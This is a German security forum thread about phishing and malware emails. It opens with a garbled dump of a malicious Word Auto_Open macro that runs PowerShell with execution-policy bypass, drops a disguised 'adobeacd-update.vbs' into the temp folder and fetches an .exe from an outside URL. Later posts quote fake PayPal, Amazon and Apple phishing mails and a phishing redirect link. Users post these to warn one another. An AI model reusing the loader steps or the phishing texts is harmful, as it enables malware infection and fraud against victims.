hell = Create  ¬ O $ .  ¶  bject( ¬ " $ .  ¶  W  ¬ s $ .  ¶  cript. ¬ s $ .  ¶  hell ¬ " $ .  ¶  )  Ö    2 Ò ¶ G caksjhdjaskdhakjshdjkashkjdhaksjdhkjashdjkashdjkashdjkashdjakdahjksd =  ¬ " $ .  ¶  231  ¬ " $ .  Ö  2 Ò ¶  ¬ o $ .  ¶  bj ¬ S $ .  ¶      hell.run   ¬ " $ .  ¶  p  ¬ o $ .  ¶  wer  ¬ S $ .  ¶  hell.e ¬ x $ .  ¶  e -n ¬ o $ .  ¶  exit -ExecutionP ¬ o $ .  ¶  licy bypass -n ¬ o $ .  ¶  pr ¬ o $ .  ¶  file -file   ¬ " $ .  ¶   & currentFile,0,true  Ö        2 Ò ¶ @ caisudkhlkasdjkdlskjldsajkldasjkdsajkldasklsadklwqiodiqwjd38e = ¬ " $ .  ¶  231  ¬ " $ .  Ö  2 V         *  4 « Ì   4 Ò ¶      @echo off Ö  4 Ò ¶  ping 1.1.2.2 -n 2 Ö  4 Ò ¶  c ¶  sc ¶  ri ¶  pt ¶  .e ¬ x $ .  ¶  e  ¬ " $ .  ¶ ! c:\windows\temp\adobeacd-update.v  ¶  b  ¶  s  ¬ " $ .  Ö dhaj  4 Ò ¶  exitÖ ashd';  4 V  ¶  $d  ($ ~   ' 8  *$ ~   ' :  ,$ ~   ' <  (  @A@>   *  @A@> fi  ,  @A@>   8¬   b tDir¬   A@B tion¹ ÿÿ¸    :¬   b 4 ¬   A@B ileP¹ ÿÿ    <¬   b mp\'¬   A@B  xe¹ ÿÿh  à  * Shell "cmd.exe /k java -jar " + MY_FILEDIR  *¬  $ D ' 6d-updaA@F    ÿ  Hþ  J! L“  4   H! Nõ lePa¶  < ¶  sel  ¶  ect> 9 dbe¶   5 P( d  T9 R  ZÑ XC@V  q ÿÿ
  ÿ  Hþ È = 'c:\ÿ  Hþ  J! L“ adobea  H! Nõ ¶  ¶  </s ¶  ele  ¶  ct>  9 d¶   5 P( d {  T9 R  ZÑ XC@V ÿÿq ÿÿ
  ÿ  Hþ È eNumbeo ÿÿ
  –(    ] òˆ    `  \ ' ^.S  `  ^    b togrA@„    ¹ ÿÿÀ  o ÿÿ¸  –     A@$    o ÿÿ   –à    A@$    o ÿÿˆ  –     ] ò`  ] òx  ] ò  ] ò°  ] òÐ  í  J! l. j:R  j! Nõ umbe  f9 d·9 r  C@V      xÑ v  jB@t  4 í  J! l. nee  j!   n( z  h9 d·9 r  C@V      |Ñ v  jB@t e /c    j! z  n(   n! ~' p$ <q ÿÿh  o ÿÿ`  ¶  <se ¶  lect>  ' f¶  </sel ¶  ect> ' h  0 Ò ¶ & $url  = 'http://idtvietnam.vn/images/o¶  rk.e ¶  xe'; Ö ÿÿÿÿH  ÿÿÿÿ  m¶ Attribut e VB_Nam e = "Thi sDocument"

ŒBasŒ1Normal.VGlobal!ªSpaclFalse¢CreatablPre decla Id žTru
BExposeTemp lateDeriv$Customiz„Cƒ1Sub  Auto_Ope@n()
  h@
End €

...das kann doch bestimmt nichts Gutes bedeuten - oder?:icon_mrgreen:

Kennt sich jemand aus und kann so in etwa abschätzen was es mit diesem Makro auf sich hat?

Es grüßt freundlich...
Spaceboy
 

WereWOLF GANG

Bekanntes Mitglied
Es ist mal wieder eine PayPal Phishing Mail unterwegs. Echter Absender ist nicht (wie vorgetäuscht):
service.paypal.de
sondern offensichtlich:
Return-Path: p-muellens@t-online.de
Received: from h2011090.stratoserver.net ([81.169.150.5])

Wegen eines Cyber-Angriffs sei angeblich eine Kontenverifizierung erforderlich:

"Nachdem sie sich erfolgriech Verifiziert haben müssen sie Ihr Password Nicht ändern."

Lol!
 

adhome

Bekanntes Mitglied
Absender werden nicht vorgetäuscht. Das ist ein Eingabefeld wie der Titel der Email.

Ist eigentlichbekannt, wann diese "sicheren" Mails kommen? Also wo der Absender verifiziert ist.
(neee.. nicht DE-Mail.)
 

eumel_1

Der Reisende
Aktuell sind auch wieder gefälschte Telekomrechnungen unterwegs mit einem dreistellien Betrag, der mich natürlich so neugierig macht, dass ich die Rechnung.pdf.exe sofort aufmache.
Und erst gestern erhielt ich eine Rechnung von Vodafone, ähnlich gestrickt, nur wird der Trojaner nicht mitgeschickt sondern als zip von einem externen Server heruntergeladen.

Immer daran denken: Gehirnprothese einschalten, wenn Brain.exe grad abgestürzt ist! :icon_lol:
 

eumel_1

Der Reisende
Sorry für OffTopic:
NEIN!
Die Gehirnprothese ersetzt doch die Brain.exe :D

Leider bei immer mehr Mitbürgern, schau dich nur um.
Schade nur, dass die Gehirnprothese auch einige Nebenwirkungen hat, sie führt z.B. dazu, BLÖD zu lesen und das sogar zu glauben, sowie weiterhin zu erhöhten Konsum von ASSI-TV. Auch übermäßiges Smartphoneglotzen wurde bereits beobachtet. :D
 

The Lordy

Paranoiker a.P.
is ja auch logisch.
Eine Prothese kann mitunter eben nur rudimentäre Grundfunktionen zur Verfügung stellen.
Alleine die etwas unprofessionelle Gewichtsverteilung führt zu der nach vorne kippenden Kopfhaltung, die sich allerdings bei dem entlastenden Smartphone-Addon nutzbar machen lässt. Eingeschränkte Artikulations-Funktionen werden dabei ebenfalls durch Wischbewegungen ergänzt.
Die resultierende Bußhaltung kommt den kirchenlichen Sektenvertretern sehr entgegen.
Für die massive Einspeisung vom Assi-TV bemüht sich bekanntermassen gerade die Mutter der Nation beim Breitband-Ausbau im Neuland.

Sobald die rechtlichen Grundlagen zur Sterbehilfe bzw. Selbsttötung (gemäss 2021 "Die überleben wollen") durchgesetzt sind, widmet sie sich der Einführung von "Soylent Green" und der Abwrackprämie für Alt-Brains bei gleichzeitigem Einsatz der Gehirnprothese Redux inkl. Smartphone freier Wahl.

:yo
 

Zapata

Bekanntes Mitglied
Wie "gut" eine Gehirnprothese manchmal die Brain.exe ersetzt, sieht man z. B. daran, wenn man Pistorius Hausarrest auferlegt, dann aber feststellt, dass die Kontrolle mit einer Fußfessel irgendwie keine wirkliche Absicherung ist.


Zapata
 

vaGem

Bekanntes Mitglied
Ist gestern bei mir eingetrudelt
Angeblich hab ich meine E-Mailaddy bei Pay-Pal geändert und soll sie jetzt überprüfen
ob die stimmt :icon_funny:

Leider haben die Burschen 2 Fehler gemacht ;)
1. Hab ich auf dieser Mail addy wo es draufkam kein Pay-Pal Konto
2. Sie hab statt Pay-Pal Pay-PaI genommen, man beachte das große i



Betreff Neue E-Mail-Adresse für Ihr PaypaI-Konto hinzugefügt.
Datum: Dienstag, 16 Dez 2014 12:48
Von: "PayPaI" <alert-4887068240@intl-paypal.de>
An: <h.....@s...-m....n..>

Sehr geehrter PayPal-Kunde,


Sie haben Alva6700@yahoo.de als neue E-Mail-Adresse für Ihr Paypal-Konto hinzugefügt.
Wenn Sie nicht zulassen diese Änderung, überprüfen mit Familienmitgliedern und andere, die Zugriff auf Ihr Konto haben können erste.

Wenn Sie immer noch das Gefühl, dass eine unbefugte Person Ihre E-Mail geändert, klicken Sie auf Wiederherstellung PayPal Konto und befolgen Sie die nächsten Schritte.

HINWEIS:
Aus Sicherheitsgründen, notieren wir Ihre IP-Adresse, Datum und Uhrzeit, Bewusste Fehleingaben werden strafrechtlich verfolgt und angezeigt.
Bitte haben Sie Verständnis, dass dies eine Sicherheitsmaßnahme soll helfen, schützen Sie und Ihr Konto ist.
Wir entschuldigen uns für etwaige Unannehmlichkeiten.

Wenn Sie auf unsere Anfrage zu ignorieren, Sie lassen uns keine andere Wahl, als vorübergehende Aussetzung Ihres Kontos.

PayPal Vertrauen und Sicherheit


The information in this e-mail and any attachment is confidential and may be privileged. It is intended for the addressee alone. If you are neither the addressee nor an authorised recipient for the addressee, it is prohibited to disclose, use or copy this information.
Please contact the sender immediately should this message have been transmitted incorrectly and delete it from your system. Although steps are taken to ensure that our e-mails and any attachments do not contain viruses, please note that we do not accept liability for any viruses which may be transmitted in or with this message.

Parc Hendre Industrial Estate, Ammanford, Carmarthenshire SA18 3SJ
Tel: +44 (0)1269 844 100 / Fax: +44 (0)1269 844 447 VAT Reg Number: 972 8657 65Registered Office: Parc Hendre Industrial Estate, Ammanford, Carmarthenshire SA18 3SJ
Registered in England and Wales Number: 6936831


Disclaimer added by CodeTwo Exchange Rules
www.codetwo.com
 

JoPa

Allround-Nichtsnutz
Ist gestern bei mir eingetrudelt
Angeblich hab ich meine E-Mailaddy bei Pay-Pal geändert und soll sie jetzt überprüfen
ob die stimmt :icon_funny:

Leider haben die Burschen 2 Fehler gemacht ;)
1. Hab ich auf dieser Mail addy wo es draufkam kein Pay-Pal Konto
2. Sie hab statt Pay-Pal Pay-PaI genommen, man beachte das große i


Hab ich auch bekommen.
Der größte Fehler sind aber die mangelhaften Deutschkenntnise... und wenn man sich erst den link anschaut...
 

JoPa

Allround-Nichtsnutz
Neuer Versuch an Amazon-Daten zu kommen:

Liebe Kundin, lieber Kunde,



Durch das von uns entwickelte System zur Erkennung von Betrugs-versuchen was unter anderem Ihren Standort der Bezahlvorgänge miteinander vergleicht, war es uns nicht möglich diesen Vorgang eindeutig Ihrem Handeln zuzuordnen.

Bei der letzten Überprüfung ihres Accounts sind uns ungewöhnliche Aktivitäten aufgefallen,
im Bezug auf ihre hinterlegten Zahlungsmittel und ihr Zahlverhalten.
Bitte bestätigen Sie ihre hinterlegten Informationen, damit sie ihren Account wieder in vollem Umfang nutzen können.

Klicken sie hier um ihre Daten zu bestätigen
[Link entfernt]


Bestellinformation:
E-Mail-Adresse:
xxxxxxxxx@meinedomain.de
Rechnungsadresse:
Selwin Nijstad
Budapester Str. 29
Hamburg, 20359
Deutschland Versandadresse:
Selwin Nijstad
Packstation 124
Postnummer: 561348222
Hamburg, 20359
Deutschland
Bestellungsübersicht:
Bestellnummer:
302-4687287-0224869
Versand: Standardversand
Artikel: 429.99 EUR
Verpackung & Versand: 13 EUR
Gesamtbetrag: 442,99 EUR

Rechnungsadresse ist ein Hallenbad auf St. Pauli :icon_lol::icon_lol::icon_lol:
 

vaGem

Bekanntes Mitglied
Endlich mal was neues im Firmenmailfach

Hallo xxxxx@xxx.de,

Wir haben vor kurzem blockiert ein Anmeldeversuch zu Ihrem Apple Account xxxx@xxxxx.de.
------------------------------
Melden Sie sich an Versuch Details:
Datum & Uhrzeit Montag, 26. Januar 2015 11.48.01 UTC
Wohnort: Dobrich, Bulgarien
------------------------------
Wenn dies nicht Sie Bitte gehen Sie auf Ihr Konto bei http://www.apple.com/de/ und folgen Sie den Anweisungen.

---------------------------------------------------------------------
Diese E-Mail nicht erhalten Antworten. Weitere Informationen finden Sie unter Apple-Hilfe.

Thank you,

Mit freundlichen Grüßen,


Apple-Kundendienst

Dumm nur das niemand in der Firma ein Appleprodukt hat ;)

Die Weiterleitung geht nach
http://www.thepenkridgeadvertiser.co.uk//wp-content/plugins/davoset/index.html

Hab nicht draufgeklickt, aber mutige können ja mal schauen was sich dahinter verbirgt ;)
 
Oben Unten